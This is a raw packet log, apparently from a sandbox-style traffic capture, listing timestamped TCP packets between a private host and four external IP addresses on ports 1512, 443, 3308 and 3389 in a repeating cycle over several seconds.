Jan 12, 2021 07:41:53.379654884 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:53.379820108 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.379836082 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.394634008 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.448734045 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:53.448940992 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.458653927 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.458858967 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.511852026 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:53.512167931 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.549134016 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:53.565104008 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:53.669047117 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:53.669114113 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:53.669198036 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.669229031 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.674860954 CET	49389	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:53.727902889 CET	1512	49389	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:53.784255981 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:53.836195946 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:53.836319923 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:53.837765932 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:53.889448881 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:53.904021025 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:53.904135942 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:53.919436932 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:53.974184036 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:53.974369049 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:53.980313063 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:53.980453014 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:54.032239914 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:54.032428026 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:54.083975077 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:54.205879927 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:54.205904961 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:54.206027031 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:54.209141016 CET	49390	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:54.263107061 CET	443	49390	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:54.326379061 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:54.370523930 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:54.370645046 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:54.371956110 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:54.415023088 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:54.426840067 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:54.426862001 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:54.426935911 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:54.441370964 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:54.486197948 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:54.486274004 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:54.491112947 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:54.491342068 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:54.534409046 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:54.534511089 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:54.578027964 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:54.691704035 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:54.691732883 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:54.691921949 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:54.694825888 CET	49391	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:54.737907887 CET	3308	49391	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:54.812382936 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:54.865914106 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:54.866004944 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:54.867186069 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:54.920515060 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:54.948754072 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:54.948779106 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:54.948872089 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:54.960851908 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:55.022702932 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:55.022914886 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:55.032012939 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:55.032253027 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:55.085649014 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:55.085939884 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:55.125291109 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:55.139121056 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:55.139142990 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:55.228353024 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:55.228379965 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:55.228455067 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:55.228574991 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:55.234335899 CET	49392	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:55.288652897 CET	3389	49392	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:55.344299078 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:55.397075891 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:55.397356033 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:55.398466110 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:55.451136112 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:55.458605051 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:55.458622932 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:55.458698034 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:55.475724936 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:55.529792070 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:55.530071974 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:55.540538073 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:55.540951014 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:55.593636036 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:55.593708992 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:55.633008957 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:55.646451950 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:55.747391939 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:55.747419119 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:55.747508049 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:55.753760099 CET	49393	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:55.806476116 CET	1512	49393	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:55.859265089 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:55.911654949 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:55.911901951 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:55.913487911 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:55.965683937 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:55.980370045 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:55.980500937 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:55.999068022 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:56.053713083 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:56.053889036 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:56.070516109 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:56.070804119 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:56.122931004 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:56.123200893 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:56.162822962 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:56.175409079 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:56.295243025 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:56.295289993 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:56.295341969 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:56.295376062 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:56.298391104 CET	49394	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:56.350518942 CET	443	49394	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:56.412800074 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:56.456127882 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.456274033 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:56.457875013 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:56.501039982 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.511842966 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.511885881 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.512038946 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:56.528338909 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:56.573884010 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.574043989 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:56.584414005 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:56.584830999 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:56.628107071 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.629616976 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:56.667251110 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.672859907 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.672904015 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.785378933 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.785459042 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.785665989 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:56.787930965 CET	49395	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:56.831079960 CET	3308	49395	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:56.900674105 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:56.954557896 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:56.954670906 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:56.955924034 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:57.009906054 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:57.028666019 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:57.028740883 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:57.028881073 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:57.042766094 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:57.101948023 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:57.102148056 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:57.107988119 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:57.108093977 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:57.162055016 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:57.162312031 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:57.201771021 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:57.216774940 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:57.216825008 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:57.306731939 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:57.306802034 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:57.307073116 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:57.312678099 CET	49396	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:57.366688013 CET	3389	49396	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:57.446343899 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.499531984 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:57.499785900 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.501082897 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.553962946 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:57.561283112 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:57.561316967 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:57.561418056 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.561456919 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.573867083 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.627994061 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:57.628300905 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.634242058 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.634484053 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.687362909 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:57.687613964 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.725064993 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:57.740528107 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:57.841264963 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:57.841320992 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:57.841567039 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.844888926 CET	49397	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:57.897700071 CET	1512	49397	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:57.961932898 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:58.014079094 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:58.014170885 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:58.014997005 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:58.067055941 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:58.081724882 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:58.081804991 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:58.093137026 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:58.147522926 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:58.147777081 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:58.153501034 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:58.153788090 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:58.205713987 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:58.205943108 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:58.258090973 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:58.376247883 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:58.376275063 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:58.376590014 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:58.380008936 CET	49398	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:41:58.432029009 CET	443	49398	77.220.64.37	192.168.2.22
Jan 12, 2021 07:41:58.492271900 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:58.535442114 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.535646915 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:58.536529064 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:58.579577923 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.590306997 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.590328932 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.590411901 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:58.602451086 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:58.648222923 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.648385048 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:58.659286976 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:58.659708023 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:58.702729940 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.702972889 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:58.742080927 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.746248007 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.746270895 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.859080076 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.859112978 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.859380007 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:58.865119934 CET	49399	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:41:58.908222914 CET	3308	49399	80.86.91.27	192.168.2.22
Jan 12, 2021 07:41:58.983345985 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.037502050 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.037652969 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.039242983 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.092508078 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.116435051 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.116461039 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.116543055 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.128514051 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.186638117 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.186738014 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.196697950 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.196878910 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.250157118 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.250298023 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.289720058 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.305001020 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.305026054 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.394911051 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.394936085 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.395169020 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.395276070 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.400826931 CET	49400	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:41:59.454721928 CET	3389	49400	5.100.228.233	192.168.2.22
Jan 12, 2021 07:41:59.525240898 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:59.580596924 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:59.580770016 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:59.582202911 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:59.635623932 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:59.642746925 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:59.642772913 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:59.642854929 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:59.657259941 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:59.711193085 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:59.711301088 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:59.722340107 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:59.722731113 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:59.775439978 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:59.775686979 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:59.813067913 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:59.828519106 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:59.929438114 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:59.929457903 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 07:41:59.929730892 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:59.935290098 CET	49401	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:41:59.987994909 CET	1512	49401	46.105.131.65	192.168.2.22
Jan 12, 2021 07:42:00.053241014 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.105509043 CET	443	49402	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:00.107599020 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.108937979 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.160974979 CET	443	49402	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:00.176278114 CET	443	49402	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:00.176440954 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.192740917 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.247009039 CET	443	49402	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:00.247111082 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.253948927 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.254101038 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.305939913 CET	443	49402	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:00.306008101 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.306035995 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.358330965 CET	443	49402	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:00.476953030 CET	443	49402	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:00.476974964 CET	443	49402	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:00.477216959 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.482891083 CET	49402	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:42:00.535303116 CET	443	49402	77.220.64.37	192.168.2.22
Jan 12, 2021 07:42:00.605379105 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:00.648781061 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:00.648951054 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:00.650475979 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:00.693598032 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:00.709692955 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:00.709728956 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:00.709784985 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:00.709880114 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:00.724368095 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:00.769704103 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:00.769903898 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:00.775836945 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:00.776055098 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:00.819201946 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:00.822660923 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:00.859118938 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:00.865792036 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:00.865978003 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:00.978179932 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:00.978238106 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:00.978437901 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:00.980638027 CET	49403	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:42:01.023833036 CET	3308	49403	80.86.91.27	192.168.2.22
Jan 12, 2021 07:42:01.096322060 CET	49404	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:01.150018930 CET	3389	49404	5.100.228.233	192.168.2.22
Jan 12, 2021 07:42:01.150190115 CET	49404	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:01.151249886 CET	49404	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:42:01.204951048 CET	3389	49404	5.100.228.233	192.168.2.22
